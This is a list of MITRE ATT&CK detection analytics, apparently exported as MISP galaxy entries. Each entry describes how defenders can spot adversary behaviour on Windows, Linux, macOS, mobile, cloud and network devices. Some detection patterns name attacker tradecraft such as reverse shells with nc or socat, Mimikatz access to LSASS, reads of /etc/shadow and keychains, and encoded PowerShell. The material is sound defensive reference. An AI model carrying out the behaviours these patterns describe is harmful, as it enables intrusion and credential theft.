Metadata key Value
external_id AN1185
mitre_platforms ['Windows']

Analytic 1851 - AN1851

Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.

Internal MISP references

UUID 6fb4668b-9c70-44d2-87a3-43ff2dc699f2 which can be used as unique global reference for Analytic 1851 - AN1851 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1851
mitre_platforms ['Android']

Analytic 1815 - AN1815

Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 89ee35d2-02ec-4c36-b51c-50e686eb3012 which can be used as unique global reference for Analytic 1815 - AN1815 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1815
mitre_platforms ['Android']

Analytic 1195 - AN1195

Unauthorized modification of service-related registry keys such as ImagePath, FailureCommand, ServiceDll, or Performance/Parameters keys. Defender correlates registry modifications, anomalous service metadata changes, and subsequent service process executions that deviate from baseline configurations.

Internal MISP references

UUID 43f5598c-5c63-40f4-b936-2978bd0f3aa0 which can be used as unique global reference for Analytic 1195 - AN1195 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1195
mitre_platforms ['Windows']

Analytic 1519 - AN1519

CLI-based export of private key material (e.g., 'crypto pki export') with anomalous user session or AAA role escalation.

Internal MISP references

UUID 57a547e1-1086-427c-9ea8-59059dec1938 which can be used as unique global reference for Analytic 1519 - AN1519 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1519
mitre_platforms ['Network Devices']

Analytic 1951 - AN1951

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 7101cd68-f6a2-4b7e-b19d-5d27b4c3b44c which can be used as unique global reference for Analytic 1951 - AN1951 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1951
mitre_platforms ['PRE']

Analytic 1591 - AN1591

Creation of email forwarding/redirect rules in Exchange Online via New-InboxRule or transport rule cmdlets, including auto-forwarding address field usage.

Internal MISP references

UUID 710aa303-3e9f-4170-95a4-b2caf5f827fd which can be used as unique global reference for Analytic 1591 - AN1591 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1591
mitre_platforms ['Office Suite']

Analytic 1159 - AN1159

Use of configuration backup utilities or CLI access to dump plaintext passwords, local user hashes, or SNMP strings.

Internal MISP references

UUID badcc199-683b-41f5-9522-9710969cff15 which can be used as unique global reference for Analytic 1159 - AN1159 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1159
mitre_platforms ['Network Devices']

Analytic 1166 - AN1166

Automated scripts or repeated CLI/API requests that trigger application backends to consume high CPU or memory (e.g., Apache/PHP, MySQL, mail servers), resulting in syslog errors and excessive process spawning.

Internal MISP references

UUID 35c7be24-c1c0-4ddc-9356-dec5e39414be which can be used as unique global reference for Analytic 1166 - AN1166 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1166
mitre_platforms ['Linux']

Analytic 1616 - AN1616

Enumeration of user or role objects via IdP API endpoints or LDAP queries.

Internal MISP references

UUID cb177f89-c8a4-4233-a2e4-3fdd02dccba1 which can be used as unique global reference for Analytic 1616 - AN1616 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1616
mitre_platforms ['Identity Provider']

Analytic 1661 - AN1661

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID 8f5e4bee-0677-41dd-89ad-8a467ae08eec which can be used as unique global reference for Analytic 1661 - AN1661 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1661
mitre_platforms ['Android']

Analytic 1176 - AN1176

Monitor pmset command executions altering sleep/hibernate/standby parameters. Unexpected modifications to /Library/Preferences/SystemConfiguration/com.apple.PowerManagement.plist or similar files should be correlated with process activity.

Internal MISP references

UUID 101d4e7f-4282-4fea-89be-e17d97ca0b91 which can be used as unique global reference for Analytic 1176 - AN1176 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1176
mitre_platforms ['macOS']

Analytic 1167 - AN1167

Repetitive triggering of GUI or backend application workflows that cause increased CPU/memory usage, logged in unified logs as spin reports or crash dumps.

Internal MISP references

UUID ade844ef-f156-4db2-bc11-9dbdc006c8d6 which can be used as unique global reference for Analytic 1167 - AN1167 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1167
mitre_platforms ['macOS']

Analytic 1617 - AN1617

Account enumeration via esxcli, vim-cmd, or API calls to vSphere.

Internal MISP references

UUID c4973f27-c8db-4478-aaf8-eb73580fceec which can be used as unique global reference for Analytic 1617 - AN1617 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1617
mitre_platforms ['ESXi']

Analytic 1671 - AN1671

Exfiltration Over C2 Channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 6a60d1be-ab95-46d2-91a7-01703553090e which can be used as unique global reference for Analytic 1671 - AN1671 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1671
mitre_platforms ['Android']

Analytic 1761 - AN1761

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 79897090-662d-4118-b73a-145f79e31829 which can be used as unique global reference for Analytic 1761 - AN1761 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1761
mitre_platforms ['iOS']

Analytic 1716 - AN1716

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID f3068304-de28-4efa-96a5-a360fc7ffc97 which can be used as unique global reference for Analytic 1716 - AN1716 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1716
mitre_platforms ['Android']

Analytic 1186 - AN1186

Registry key modifications under IFEO paths (e.g., Debugger value set under Image File Execution Options), especially for security-related or accessibility binaries, followed by anomalous process execution with debugger flags or SYSTEM-level access at login. Detectable by correlating registry modifications, process creation, and parent-child anomalies with unusual command-line usage or access tokens.

Internal MISP references

UUID 3e5b15b0-e6b2-402a-9c4f-e483c968a38e which can be used as unique global reference for Analytic 1186 - AN1186 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1186
mitre_platforms ['Windows']

Analytic 1168 - AN1168

Automated abuse of cloud-hosted applications (e.g., web apps, REST endpoints, internal APIs) causing compute exhaustion, high 5xx error rates, or frequent autoscaling triggers logged in Application Insights or CloudWatch.

Internal MISP references

UUID 867239cd-7939-446c-9efb-b2a7a5bd5403 which can be used as unique global reference for Analytic 1168 - AN1168 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1168
mitre_platforms ['IaaS']

Analytic 1618 - AN1618

Account enumeration via bulk access to user directory features or hidden APIs.

Internal MISP references

UUID d85db7b4-5eb1-4781-b92c-a18102a568dc which can be used as unique global reference for Analytic 1618 - AN1618 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1618
mitre_platforms ['SaaS']

Analytic 1816 - AN1816

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block bidirectional command and control traffic.

Internal MISP references

UUID 1f1d8e33-293a-4ceb-a91c-0cf71c6805ea which can be used as unique global reference for Analytic 1816 - AN1816 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1816
mitre_platforms ['Android']

Analytic 1681 - AN1681

Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f12b94b0-ec2f-4eb1-9ea4-8632e41475a1 which can be used as unique global reference for Analytic 1681 - AN1681 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1681
mitre_platforms ['Android']

Analytic 1619 - AN1619

Account discovery via VBA macros, COM objects, or embedded scripting.

Internal MISP references

UUID 06e0501e-a87e-452d-9ab5-93ed9a5eade5 which can be used as unique global reference for Analytic 1619 - AN1619 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1619
mitre_platforms ['Office Suite']

Analytic 1169 - AN1169

Detects FTP, SMB, or TFTP traffic initiated by suspicious processes like PowerShell, cmd.exe, or rundll32.exe—especially with large outbound file transfers or unbalanced traffic volume.

Internal MISP references

UUID befbbdad-a17b-41f2-bb24-5cb477c5cc50 which can be used as unique global reference for Analytic 1169 - AN1169 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1169
mitre_platforms ['Windows']

Analytic 1961 - AN1961

Once adversaries leverage serverless functions as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle.

Internal MISP references

UUID c755e8b9-7e07-4e9a-95a1-bc7cb88e878a which can be used as unique global reference for Analytic 1961 - AN1961 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1961
mitre_platforms ['PRE']

Analytic 1196 - AN1196

Abuse of bind mounts to obscure process directories. Defender perspective: detecting anomalous mount operations where a process’s /proc entry is remapped to another directory, often hiding malicious activity from native utilities (ps, top). Behavior chain includes: (1) execution of mount with -o bind or -B flags, (2) modification of /proc entries inconsistent with expected process lineage, and (3) subsequent anomalous activity from processes whose metadata no longer matches execution context.

Internal MISP references

UUID d5c81e57-37c4-4393-a202-0955af560983 which can be used as unique global reference for Analytic 1196 - AN1196 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1196
mitre_platforms ['Linux']

Analytic 1691 - AN1691

Application vetting services could look for applications attempting to get android.os.SystemProperties or getprop with the runtime exec() commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID 66adf2b9-42aa-401f-8bc3-3830854017ee which can be used as unique global reference for Analytic 1691 - AN1691 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1691
mitre_platforms ['Android']

Analytic 1177 - AN1177

Multi-stage Windows DACL manipulation behavioral chain: (1) Process creation of permission-modifying utilities (icacls.exe, takeown.exe, attrib.exe, cacls.exe) or PowerShell ACL cmdlets, (2) Command-line analysis revealing privilege escalation intent through suspicious parameters (/grant, /takeown, /T, Set-Acl), (3) DACL modification events (4670) correlating with process execution, (4) Subsequent file access attempts (4663) indicating successful permission bypass, (5) Potential follow-on persistence or lateral movement activities

Internal MISP references

UUID 7e4ac594-c46c-4c7e-ba6d-9a457ab1e767 which can be used as unique global reference for Analytic 1177 - AN1177 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1177
mitre_platforms ['Windows']

Analytic 1717 - AN1717

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID 369938c8-6b9e-4eb3-8105-eb76a373dc35 which can be used as unique global reference for Analytic 1717 - AN1717 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1717
mitre_platforms ['iOS']

Analytic 1771 - AN1771

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block command and control traffic.

Internal MISP references

UUID a0bb0e33-c40f-46f5-b64a-07faa6946d83 which can be used as unique global reference for Analytic 1771 - AN1771 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1771
mitre_platforms ['iOS']

Analytic 1187 - AN1187

Detection focuses on correlating snapshot creation events with subsequent instance creation and mounting activities. From a defender perspective, suspicious sequences include snapshot creation by unexpected or newly created IAM users, snapshots created from sensitive volumes without preceding change-control activity, or snapshots immediately followed by mounting to unauthorized instances. Cross-referencing with user behavior, IP geolocation, and automation context helps distinguish benign backup operations from adversary-driven snapshot exploitation.

Internal MISP references

UUID 05af7b9b-ec1a-4d6c-a944-64a7ad0eb2f5 which can be used as unique global reference for Analytic 1187 - AN1187 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1187
mitre_platforms ['IaaS']

Analytic 1178 - AN1178

Correlate DNS queries that generate domains with high entropy or gibberish patterns, combined with short-lived connections from unusual processes. Monitor Sysmon DNS events and Windows Security logs for abnormal query rates and failed lookups.

Internal MISP references

UUID ee7499f8-4262-47cf-8fff-5344f60bf2cf which can be used as unique global reference for Analytic 1178 - AN1178 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1178
mitre_platforms ['Windows']

Analytic 1718 - AN1718

Application vetting services can detect when an application requests administrator permission. When an application requests administrator permission, the user is presented with a popup and the option to grant or deny the request.

Internal MISP references

UUID 31542445-39c5-4ae9-806f-09649581056a which can be used as unique global reference for Analytic 1718 - AN1718 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1718
mitre_platforms ['Android']

Analytic 1817 - AN1817

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block bidirectional command and control traffic.

Internal MISP references

UUID c08bd552-98fd-446d-b848-3c43b3b766f1 which can be used as unique global reference for Analytic 1817 - AN1817 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1817
mitre_platforms ['iOS']

Analytic 1781 - AN1781

Application vetting services may be able to detect if an application attempts to encrypt files, although this may be benign behavior.

Internal MISP references

UUID c37bba44-9ca2-4444-8ee9-7cab0b2fd5fd which can be used as unique global reference for Analytic 1781 - AN1781 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1781
mitre_platforms ['Android']

Analytic 1179 - AN1179

Identify processes issuing repeated DNS queries to random-looking domains with abnormal entropy or word concatenations. Correlate resolver logs with high NXDOMAIN rates and auditd socket connections.

Internal MISP references

UUID 0faa41a3-0d4c-42d1-885a-12436fbee9c1 which can be used as unique global reference for Analytic 1179 - AN1179 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1179
mitre_platforms ['Linux']

Analytic 1971 - AN1971

If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.

Internal MISP references

UUID 1fec971d-c822-4819-9489-8c27857e3481 which can be used as unique global reference for Analytic 1971 - AN1971 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1971
mitre_platforms ['PRE']

Analytic 1197 - AN1197

Detects the modification or addition of Launch Agents or Startup Items to establish persistence. Adversaries may write plist or executable files to ~/Library/LaunchAgents/, /Library/StartupItems/, or similar directories and configure them to run at user or system boot. Detection requires correlating file creation or modification events with subsequent user logon or boot-time process execution.

Internal MISP references

UUID c46d9fac-eac9-479e-91d3-4f5a1066972d which can be used as unique global reference for Analytic 1197 - AN1197 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1197
mitre_platforms ['macOS']

Analytic 1719 - AN1719

Application vetting services could detect usage of standard clipboard APIs.

Internal MISP references

UUID 4b2e7e2d-e1be-4829-9011-53eb5eca3dc6 which can be used as unique global reference for Analytic 1719 - AN1719 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1719
mitre_platforms ['Android']

Analytic 1791 - AN1791

Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.

Internal MISP references

UUID cd82f432-ee4e-4df0-8500-e381b36479ec which can be used as unique global reference for Analytic 1791 - AN1791 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1791
mitre_platforms ['Android']

Analytic 1188 - AN1188

Creation, deletion, or modification of security groups and firewall rules in cloud control plane logs that expand access to cloud resources beyond expected baselines. Defender view: unexpected ingress/egress rules permitting 0.0.0.0/0 or opening atypical ports, often correlated with privileged role or API key activity.

Internal MISP references

UUID ee7c904b-144f-4dc4-87af-7eee4655899c which can be used as unique global reference for Analytic 1188 - AN1188 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1188
mitre_platforms ['IaaS']

Analytic 1818 - AN1818

Exfiltration Over Unencrypted Non-C2 Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID ece5746f-194b-4564-9f5f-7ebf3b23542e which can be used as unique global reference for Analytic 1818 - AN1818 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1818
mitre_platforms ['Android']

Analytic 1189 - AN1189

Detects unusual outbound connections to web services from uncommon processes using SSL/TLS, particularly those exhibiting high outbound data volume or persistence.

Internal MISP references

UUID 5a10a19a-035e-469e-8ec5-fafb1f0f0fe6 which can be used as unique global reference for Analytic 1189 - AN1189 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1189
mitre_platforms ['Windows']

Analytic 1981 - AN1981

Much of this activity may have a very high occurrence and associated false positive rate, and may also take place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 65390827-81d9-43d0-9c9d-16d8c6509b90 which can be used as unique global reference for Analytic 1981 - AN1981 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1981
mitre_platforms ['PRE']

Analytic 1198 - AN1198

Monitors suspicious access to password stores such as LSASS, DPAPI, Windows Credential Manager, or browser credential databases. Detects anomalous process-to-process access (e.g., Mimikatz accessing LSASS) and correlation of credential store file reads with execution of non-standard processes.

Internal MISP references

UUID de4fe01d-96d7-4258-a1d6-6958fe50a4ed which can be used as unique global reference for Analytic 1198 - AN1198 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1198
mitre_platforms ['Windows']

Analytic 1819 - AN1819

Exfiltration Over Unencrypted Non-C2 Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 111bf5b3-ce1c-4f60-b1b0-deef85fc6a0a which can be used as unique global reference for Analytic 1819 - AN1819 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1819
mitre_platforms ['iOS']

Analytic 1991 - AN1991

Once adversaries leverage compromised network devices as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle.

Internal MISP references

UUID 4384e648-0f49-442d-b989-6a47f2194130 which can be used as unique global reference for Analytic 1991 - AN1991 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1991
mitre_platforms ['PRE']

Analytic 1199 - AN1199

Detects access to known password store files (e.g., /etc/shadow, GNOME Keyring, KWallet, browser credential databases). Monitors anomalous process read attempts and suspicious API calls that attempt to extract stored credentials.

Internal MISP references

UUID 571b10ce-fb7d-492e-b05a-23649ae14148 which can be used as unique global reference for Analytic 1199 - AN1199 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1199
mitre_platforms ['Linux']

Analytic 1222 - AN1222

Detection of anomalous registry modifications to Subject Interface Packages (SIPs) or trust provider DLL mappings, unexpected loading of non-Microsoft cryptographic modules, or attempts to redirect WinVerifyTrust validation logic. Defender view focuses on registry tampering, suspicious DLL loads into trusted processes, and abnormal trust validation failures correlated across event streams.

Internal MISP references

UUID 5b6f6588-3434-4199-b16f-af44ae546c3d which can be used as unique global reference for Analytic 1222 - AN1222 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1222
mitre_platforms ['Windows']

Analytic 1322 - AN1322

Detects unauthorized changes to locally hosted login pages on macOS (common in developer VPN environments) and links file edits to cron jobs, background scripts, or SUID binaries.

Internal MISP references

UUID 564071d9-44b1-44b8-92c0-348e22e544b7 which can be used as unique global reference for Analytic 1322 - AN1322 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1322
mitre_platforms ['macOS']

Analytic 1223 - AN1223

Detects anomalous process execution patterns where a process's parent terminates quickly after process creation or is re-parented to 'init' (PID 1), often indicating double-fork or daemon-style detachment. These behaviors sever the parent-child relationship and obscure the execution origin in process tree analysis.

Internal MISP references

UUID d4a29d94-bce4-4069-a0b5-9e0e731cff97 which can be used as unique global reference for Analytic 1223 - AN1223 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1223
mitre_platforms ['Linux']

Analytic 1232 - AN1232

Direct use of nc, socat, or reverse tunnel scripts initiated by abnormal user contexts or unauthorized VIBs initiating connections from hypervisor to external systems.

Internal MISP references

UUID d8cc8663-020b-4fde-a8de-a92ecf97aea4 which can be used as unique global reference for Analytic 1232 - AN1232 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1232
mitre_platforms ['ESXi']

Analytic 1224 - AN1224

Detects execution patterns where a child process is detached from its original parent, often showing up under 'launchd' (PID 1) with no parent lineage. These breakages in the process tree are indicative of evasive techniques using daemon(), fork() or background execution flags.

Internal MISP references

UUID 269ab5e4-4c45-4f7a-8d82-c235492ff83a which can be used as unique global reference for Analytic 1224 - AN1224 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1224
mitre_platforms ['macOS']

Analytic 1422 - AN1422

Detects container breakout behavior via exploitation (e.g., DirtyPipe, CVE-2022-0847), followed by host OS interaction or escalated capability assignment.

Internal MISP references

UUID 2a93100f-6332-4c91-bad9-fd371d638309 which can be used as unique global reference for Analytic 1422 - AN1422 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1422
mitre_platforms ['Containers']

Analytic 1242 - AN1242

Detection focuses on abnormal or unauthorized cloud instance creation events. From a defender’s perspective, suspicious behavior includes VM/instance creation by rarely used or newly created accounts, creation events from unusual geolocations, or rapid sequences of snapshot creation followed by instance creation and mounting. Unexpected network or IAM policy changes applied to new instances can indicate adversarial use rather than legitimate provisioning.

Internal MISP references

UUID b8ec766b-cfb9-4ef8-bd46-655f0b820ad3 which can be used as unique global reference for Analytic 1242 - AN1242 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1242
mitre_platforms ['IaaS']

Analytic 1522 - AN1522

Repeated failed SSH login attempts followed by a possible success from the same remote host.

Internal MISP references

UUID 14390641-6cba-4351-a488-bf97c6eee8a7 which can be used as unique global reference for Analytic 1522 - AN1522 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1522
mitre_platforms ['Linux']

Analytic 1252 - AN1252

Detects behavioral chains where PowerShell is launched with encoded commands, unusual parent processes, or suspicious modules loaded, potentially followed by network connections or child process spawning. Supports detection of both direct (powershell.exe) and indirect (.NET automation) invocations.

Internal MISP references

UUID 78864416-9ea3-4285-aab4-ecf31c935253 which can be used as unique global reference for Analytic 1252 - AN1252 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1252
mitre_platforms ['Windows']

Analytic 1225 - AN1225

Detects suspicious usage of common application-layer protocols (e.g., HTTP, HTTPS, DNS, SMB) by abnormal processes, with high outbound byte counts or irregular ports, possibly indicating command and control or data exfiltration.

Internal MISP references

UUID 908aa2d1-f1c0-456b-9c9f-b984b309e51c which can be used as unique global reference for Analytic 1225 - AN1225 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1225
mitre_platforms ['Windows']

Analytic 1622 - AN1622

Adversary modifies externally-facing web content by accessing and overwriting hosted HTML/JS/CSS files, typically following web shell deployment, credential abuse, or exploitation of web application vulnerabilities.

Internal MISP references

UUID 67febd8b-36fe-4f72-8647-95fe449ecb5d which can be used as unique global reference for Analytic 1622 - AN1622 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1622
mitre_platforms ['Windows']

Analytic 1226 - AN1226

Detects suspicious curl, wget, or custom socket traffic that leverages DNS, HTTPS, or IRC-style protocols with unbalanced traffic or beacon-like intervals.

Internal MISP references

UUID 989a524f-cf9a-4fcc-a21f-ac5aac46f0ed which can be used as unique global reference for Analytic 1226 - AN1226 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1226
mitre_platforms ['Linux']

Analytic 1262 - AN1262

Multiple failed authentication attempts using distinct username/password pairs from a single IP address or session within a short time window, targeting common services like RDP or SMB.

Internal MISP references

UUID e3e2d59b-220f-43b0-9891-7b299be27c50 which can be used as unique global reference for Analytic 1262 - AN1262 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1262
mitre_platforms ['Windows']

Analytic 1272 - AN1272

Unusual mounting of loopback or pseudo file systems not aligned with legitimate administrative activity. Defender view: monitoring auditd and syslog for mount commands involving suspicious mount points, reserved blocks, or device mappings indicative of hidden partitions.

Internal MISP references

UUID 35300a0c-e135-4865-9fe5-9d65a1c77dda which can be used as unique global reference for Analytic 1272 - AN1272 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1272
mitre_platforms ['Linux']

Analytic 1227 - AN1227

Detects applications using abnormal protocols or high volume traffic not previously associated with the process image, such as Automator or AppleScript invoking curl or python sockets.

Internal MISP references

UUID c2b959ca-75f4-4291-9812-0b065e7bb395 which can be used as unique global reference for Analytic 1227 - AN1227 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1227
mitre_platforms ['macOS']

Analytic 1722 - AN1722

Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.

Internal MISP references

UUID d4dc642d-922b-4476-ad3f-ba23c43702f5 which can be used as unique global reference for Analytic 1722 - AN1722 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1722
mitre_platforms ['Android']

Analytic 1228 - AN1228

Detects application-layer tunneling or unauthorized app protocols like DNS-over-HTTPS, embedded C2 in TLS/HTTP headers, or misused SMB traffic crossing VLANs.

Internal MISP references

UUID c5117811-b262-4920-90d9-001d25b6305b which can be used as unique global reference for Analytic 1228 - AN1228 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1228
mitre_platforms ['Network Devices']

Analytic 1282 - AN1282

Use of the security command or Keychain API to extract known Wi-Fi passwords for target SSIDs.

Internal MISP references

UUID ce2233bb-9715-4e7b-8603-7218f8bae326 which can be used as unique global reference for Analytic 1282 - AN1282 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1282
mitre_platforms ['macOS']

Analytic 1822 - AN1822

The user can review available call logs for irregularities, such as missing or unrecognized calls. The user can view their default phone app in device settings.

Internal MISP references

UUID d2cf1cf2-7b11-4018-b5bc-fbd48633f869 which can be used as unique global reference for Analytic 1822 - AN1822 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1822
mitre_platforms ['Android']

Analytic 1229 - AN1229

Suspicious process spawning (e.g., rundll32, svchost, powershell, or netsh) followed by network connection creation to internal hosts or uncommon external endpoints on high or non-standard ports.

Internal MISP references

UUID 0e9add05-93bd-47b2-acf5-1817f03e804a which can be used as unique global reference for Analytic 1229 - AN1229 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1229
mitre_platforms ['Windows']

Analytic 1292 - AN1292

Detects DHCP spoofing by monitoring unified logs for unexpected DHCP ACK/OFFER parameters and correlating with packet captures for multiple DHCP servers. Behavioral emphasis is on inconsistent DNS and gateway assignments that redirect traffic.

Internal MISP references

UUID 4f2bc468-a57d-44e9-b9cd-d491df6b0daf which can be used as unique global reference for Analytic 1292 - AN1292 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1292
mitre_platforms ['macOS']

Analytic 1332 - AN1332

Monitor resolver logs and auditd events for domains resolving to a rotating set of IPs within very short TTL intervals. Correlate high query rates from non-browser applications (e.g., python, curl).

Internal MISP references

UUID 8a226737-e2a7-4b70-8964-98c47444a638 which can be used as unique global reference for Analytic 1332 - AN1332 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1332
mitre_platforms ['Linux']

Analytic 1233 - AN1233

Dynamic or static port forwarding rules added to route traffic through an internal host, or configuration changes to proxy firewall rules not aligned with baselined policy.

Internal MISP references

UUID a79ae1d1-1a8d-427d-aa6d-261ea63d5650 which can be used as unique global reference for Analytic 1233 - AN1233 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1233
mitre_platforms ['Network Devices']

Analytic 1323 - AN1323

